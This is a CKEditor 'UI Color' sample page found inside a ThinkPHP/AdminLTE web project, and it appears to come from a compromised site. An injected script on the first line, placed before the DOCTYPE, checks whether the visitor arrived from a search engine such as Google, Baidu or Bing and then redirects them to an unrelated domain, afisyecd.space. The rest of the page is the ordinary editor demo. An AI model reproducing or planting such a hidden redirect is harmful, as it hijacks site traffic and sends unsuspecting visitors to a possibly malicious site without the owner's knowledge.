d:\wwwroot\wuchunhua\thinkphp\public\adminlte\plugins\ckeditor\samples\old\uicolor.html
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html>
002:
<!--
003:
Copyright (c) 2003-2016, CKSource - Frederico Knabben. All rights reserved.
004:
For licensing, see LICENSE.md or http://ckeditor.com/license
005:
-->
006:
<html>
007:
<head>
008:
<meta charset="utf-8">
009:
<title>UI Color Picker — CKEditor Sample</title>
010:
<script src="../../ckeditor.js"></script>
011:
<link rel="stylesheet" href="sample.css">
012:
</head>
013:
<body>
014:
<h1 class="samples">
015:
<a href="index.html">CKEditor Samples</a> » UI Color
016:
</h1>
017:
<div class="warning deprecated">
018:
This sample is not maintained anymore. Check out its <a href="http://sdk.ckeditor.com/samples/uicolor.html">brand new version in CKEditor SDK</a>.
019:
</div>
020:
<div class="description">
021:
<p>
022:
This sample shows how to automatically replace <code><textarea></code> elements
023:
with a CKEditor instance with an option to change the color of its user interface.<br>
024:
<strong>Note:</strong>The UI skin color feature depends on the CKEditor skin
025:
compatibility. The Moono and Kama skins are examples of skins that work with it.
026:
</p>
027:
</div>
028:
<form action="sample_posteddata.php" method="post">
029:
<p>
030:
This editor instance has a UI color value defined in configuration to change the skin color,
031:
To specify the color of the user interface, set the <code>uiColor</code> property:
032:
</p>
033:
<pre class="samples">
034:
CKEDITOR.replace( '<em>textarea_id</em>', {
035:
<strong>uiColor: '#14B8C4'</strong>
036:
});</pre>
037:
<p>
038:
Note that <code><em>textarea_id</em></code> in the code above is the <code>id</code> attribute of
039:
the <code><textarea></code> element to be replaced.
040:
</p>
041:
<p>
042:
<textarea cols="80" id="editor1" name="editor1" rows="10"><p>This is some <strong>sample text</strong>. You are using <a href="http://ckeditor.com/">CKEditor</a>.</p></textarea>
043:
<script>
044:
045:
// Replace the <textarea id="editor"> with an CKEditor
046:
// instance, using default configurations.
047:
CKEDITOR.replace( 'editor1', {
048:
uiColor: '#14B8C4',
049:
toolbar: [
050:
[ 'Bold', 'Italic', '-', 'NumberedList', 'BulletedList', '-', 'Link', 'Unlink' ],
051:
[ 'FontSize', 'TextColor', 'BGColor' ]
052:
]
053:
});
054:
055:
</script>
056:
</p>
057:
<p>
058:
<input type="submit" value="Submit">
059:
</p>
060:
</form>
061:
<div id="footer">
062:
<hr>
063:
<p>
064:
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
065:
</p>
066:
<p id="copy">
067:
Copyright © 2003-2016, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico
068:
Knabben. All rights reserved.
069:
</p>
070:
</div>
071:
</body>
072:
</html>
073:
074:
075: